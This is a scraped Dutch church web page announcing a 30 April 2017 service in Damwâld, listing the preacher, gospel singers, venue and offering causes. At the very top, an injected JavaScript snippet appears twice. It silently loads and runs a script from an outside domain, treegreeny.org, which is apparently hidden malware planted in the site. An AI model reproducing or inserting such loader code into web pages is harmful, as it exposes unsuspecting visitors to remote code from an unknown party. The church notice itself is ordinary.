;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Terugblik kampweekend - PKN Damwâld
zondag 30 april 2017
14:00 uur

Terugblik kampweekend

Thema: ‘Klaar voor de start <> naastenliefde’ !

Informatie

Voorganger:Ds. S. Boukes
Organist:m.m.v. gospelsingers The Pilgrims
Thema:‘Klaar voor de start <> naastenliefde’ !
Locatie: de Ontmoeting Foarwei 38, 9104 BX Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Liliane fonds
Tweede collecte: Kerk, eigen middelen
Uitganscollecte: Onderhoud en inventaris